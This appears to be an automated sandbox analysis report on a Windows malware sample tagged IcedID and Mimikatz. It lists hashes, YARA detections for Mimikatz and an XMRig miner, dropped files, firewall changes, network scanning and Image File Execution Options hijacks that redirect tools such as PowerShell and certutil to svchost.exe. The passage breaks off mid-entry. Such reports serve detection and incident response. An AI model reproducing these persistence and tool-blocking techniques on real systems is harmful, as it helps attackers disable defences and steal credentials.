Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
19-06-2024 12:29
Behavioral task
behavioral1
Sample
2024-06-19_5e2c81c9370280d0519e8fb9f2b1cb43_hacktools_icedid_mimikatz.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
2024-06-19_5e2c81c9370280d0519e8fb9f2b1cb43_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240611-en
General
-
Target
2024-06-19_5e2c81c9370280d0519e8fb9f2b1cb43_hacktools_icedid_mimikatz.exe
-
Size
7.9MB
-
MD5
5e2c81c9370280d0519e8fb9f2b1cb43
-
SHA1
a6318a5ca15d778373b81613c9efab15745c8b6b
-
SHA256
a4e3c721ea39e5864a3b7b4a285661d6b4b8ead444413a0c7f106dbf12df5d6b
-
SHA512
b53c915750ff40167269180a796a8b73387e0b028d2421917b312939e03ba4280513ab7864c88fe2707fce4e42960910baa009035b99458f024b463662ba4b0a
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4608 created 1864 4608 yaytfet.exe 37 -
Contacts a large (30351) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/1676-182-0x00007FF75C320000-0x00007FF75C440000-memory.dmp xmrig behavioral2/memory/1676-194-0x00007FF75C320000-0x00007FF75C440000-memory.dmp xmrig behavioral2/memory/1676-200-0x00007FF75C320000-0x00007FF75C440000-memory.dmp xmrig behavioral2/memory/1676-212-0x00007FF75C320000-0x00007FF75C440000-memory.dmp xmrig behavioral2/memory/1676-221-0x00007FF75C320000-0x00007FF75C440000-memory.dmp xmrig behavioral2/memory/1676-234-0x00007FF75C320000-0x00007FF75C440000-memory.dmp xmrig behavioral2/memory/1676-251-0x00007FF75C320000-0x00007FF75C440000-memory.dmp xmrig behavioral2/memory/1676-253-0x00007FF75C320000-0x00007FF75C440000-memory.dmp xmrig behavioral2/memory/1676-256-0x00007FF75C320000-0x00007FF75C440000-memory.dmp xmrig behavioral2/memory/1676-307-0x00007FF75C320000-0x00007FF75C440000-memory.dmp xmrig behavioral2/memory/1676-313-0x00007FF75C320000-0x00007FF75C440000-memory.dmp xmrig behavioral2/memory/1676-316-0x00007FF75C320000-0x00007FF75C440000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/1840-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1840-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023411-6.dat mimikatz behavioral2/memory/2956-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3444-138-0x00007FF64BDC0000-0x00007FF64BEAE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts yaytfet.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts yaytfet.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe yaytfet.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yaytfet.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3972 netsh.exe 2168 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 2956 yaytfet.exe 4608 yaytfet.exe 5116 wpcap.exe 1400 efgtnfata.exe 3444 vfshost.exe 3140 gtfbuuhyt.exe 4184 xohudmc.exe 448 dipzew.exe 1676 qesayc.exe 5096 gtfbuuhyt.exe 5068 gtfbuuhyt.exe 4412 gtfbuuhyt.exe 64 gtfbuuhyt.exe 1212 gtfbuuhyt.exe 2652 gtfbuuhyt.exe 3080 gtfbuuhyt.exe 2456 gtfbuuhyt.exe 1480 gtfbuuhyt.exe 2596 gtfbuuhyt.exe 3412 gtfbuuhyt.exe 4460 gtfbuuhyt.exe 1372 gtfbuuhyt.exe 2460 gtfbuuhyt.exe 1212 yaytfet.exe 3344 gtfbuuhyt.exe 3856 gtfbuuhyt.exe 3884 gtfbuuhyt.exe 2088 qgchhgsrs.exe 5116 yaytfet.exe -
Loads dropped DLL 12 IoCs
pid Process 5116 wpcap.exe 5116 wpcap.exe 5116 wpcap.exe 5116 wpcap.exe 5116 wpcap.exe 5116 wpcap.exe 5116 wpcap.exe 5116 wpcap.exe 5116 wpcap.exe 1400 efgtnfata.exe 1400 efgtnfata.exe 1400 efgtnfata.exe -
resource yara_rule behavioral2/files/0x0007000000023460-135.dat upx behavioral2/memory/3444-136-0x00007FF64BDC0000-0x00007FF64BEAE000-memory.dmp upx behavioral2/memory/3444-138-0x00007FF64BDC0000-0x00007FF64BEAE000-memory.dmp upx behavioral2/memory/3140-142-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/files/0x0007000000023468-141.dat upx behavioral2/memory/3140-160-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/files/0x000700000002346a-164.dat upx behavioral2/memory/1676-165-0x00007FF75C320000-0x00007FF75C440000-memory.dmp upx behavioral2/memory/5096-171-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/5068-175-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/4412-179-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/1676-182-0x00007FF75C320000-0x00007FF75C440000-memory.dmp upx behavioral2/memory/64-184-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/1212-188-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/2652-192-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/1676-194-0x00007FF75C320000-0x00007FF75C440000-memory.dmp upx behavioral2/memory/3080-197-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/1676-200-0x00007FF75C320000-0x00007FF75C440000-memory.dmp upx behavioral2/memory/2456-202-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/1480-206-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/2596-210-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/1676-212-0x00007FF75C320000-0x00007FF75C440000-memory.dmp upx behavioral2/memory/3412-215-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/4460-219-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/1676-221-0x00007FF75C320000-0x00007FF75C440000-memory.dmp upx behavioral2/memory/1372-224-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/2460-228-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/3344-233-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/3856-235-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/1676-234-0x00007FF75C320000-0x00007FF75C440000-memory.dmp upx behavioral2/memory/3856-237-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/3884-239-0x00007FF7B3CD0000-0x00007FF7B3D2B000-memory.dmp upx behavioral2/memory/1676-251-0x00007FF75C320000-0x00007FF75C440000-memory.dmp upx behavioral2/memory/1676-253-0x00007FF75C320000-0x00007FF75C440000-memory.dmp upx behavioral2/memory/1676-256-0x00007FF75C320000-0x00007FF75C440000-memory.dmp upx behavioral2/memory/1676-307-0x00007FF75C320000-0x00007FF75C440000-memory.dmp upx behavioral2/memory/1676-313-0x00007FF75C320000-0x00007FF75C440000-memory.dmp upx behavioral2/memory/1676-316-0x00007FF75C320000-0x00007FF75C440000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 79 ifconfig.me 80 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 yaytfet.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE yaytfet.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E40FD8910F68839A32C4CF3F7FD8741B yaytfet.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft yaytfet.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData yaytfet.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content yaytfet.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E40FD8910F68839A32C4CF3F7FD8741B yaytfet.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies yaytfet.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache yaytfet.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 yaytfet.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 yaytfet.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\dipzew.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\dipzew.exe xohudmc.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\bpzelrleu\UnattendGC\specials\schoedcl.xml yaytfet.exe File opened for modification C:\Windows\nflfrgth\svschost.xml yaytfet.exe File opened for modification C:\Windows\nflfrgth\docmicfg.xml yaytfet.exe File created C:\Windows\bpzelrleu\etctgsilg\wpcap.dll yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\zlib1.dll yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\docmicfg.xml yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\AppCapture64.dll yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\tibe-2.dll yaytfet.exe File created C:\Windows\bpzelrleu\etctgsilg\ip.txt yaytfet.exe File created C:\Windows\nflfrgth\yaytfet.exe 2024-06-19_5e2c81c9370280d0519e8fb9f2b1cb43_hacktools_icedid_mimikatz.exe File created C:\Windows\bpzelrleu\etctgsilg\qgchhgsrs.exe yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\exma-1.dll yaytfet.exe File created C:\Windows\bpzelrleu\Corporate\mimilib.dll yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\ucl.dll yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\spoolsrv.exe yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\vimpcsvc.xml yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\posh-0.dll yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\trfo-2.dll yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\svschost.exe yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\vimpcsvc.xml yaytfet.exe File created C:\Windows\nflfrgth\svschost.xml yaytfet.exe File created C:\Windows\bpzelrleu\Corporate\mimidrv.sys yaytfet.exe File created C:\Windows\bpzelrleu\upbdrjv\swrpwe.exe yaytfet.exe File created C:\Windows\bpzelrleu\etctgsilg\scan.bat yaytfet.exe File opened for modification C:\Windows\nflfrgth\yaytfet.exe 2024-06-19_5e2c81c9370280d0519e8fb9f2b1cb43_hacktools_icedid_mimikatz.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\coli-0.dll yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\crli-0.dll yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\libeay32.dll yaytfet.exe File created C:\Windows\nflfrgth\spoolsrv.xml yaytfet.exe File created C:\Windows\nflfrgth\vimpcsvc.xml yaytfet.exe File created C:\Windows\bpzelrleu\Corporate\vfshost.exe yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\tucl-1.dll yaytfet.exe File created C:\Windows\bpzelrleu\etctgsilg\efgtnfata.exe yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\cnli-1.dll yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\schoedcl.exe yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\spoolsrv.xml yaytfet.exe File created C:\Windows\bpzelrleu\etctgsilg\Packet.dll yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\libxml2.dll yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\trch-1.dll yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\svschost.xml yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\docmicfg.xml yaytfet.exe File opened for modification C:\Windows\bpzelrleu\Corporate\log.txt cmd.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\ssleay32.dll yaytfet.exe File opened for modification C:\Windows\bpzelrleu\etctgsilg\Packet.dll yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\schoedcl.xml yaytfet.exe File created C:\Windows\nflfrgth\schoedcl.xml yaytfet.exe File opened for modification C:\Windows\bpzelrleu\etctgsilg\Result.txt qgchhgsrs.exe File created C:\Windows\bpzelrleu\UnattendGC\svschost.xml yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\spoolsrv.xml yaytfet.exe File opened for modification C:\Windows\nflfrgth\spoolsrv.xml yaytfet.exe File opened for modification C:\Windows\nflfrgth\schoedcl.xml yaytfet.exe File created C:\Windows\ime\yaytfet.exe yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\xdvl-0.dll yaytfet.exe File opened for modification C:\Windows\nflfrgth\vimpcsvc.xml yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\Shellcode.ini yaytfet.exe File created C:\Windows\bpzelrleu\etctgsilg\wpcap.exe yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\vimpcsvc.exe yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\specials\docmicfg.exe yaytfet.exe File created C:\Windows\nflfrgth\docmicfg.xml yaytfet.exe File created C:\Windows\bpzelrleu\UnattendGC\AppCapture32.dll yaytfet.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2896 sc.exe 3112 sc.exe 4048 sc.exe 4424 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023411-6.dat nsis_installer_2 behavioral2/files/0x0011000000023424-14.dat nsis_installer_1 behavioral2/files/0x0011000000023424-14.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" yaytfet.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" gtfbuuhyt.exe Set value (int) 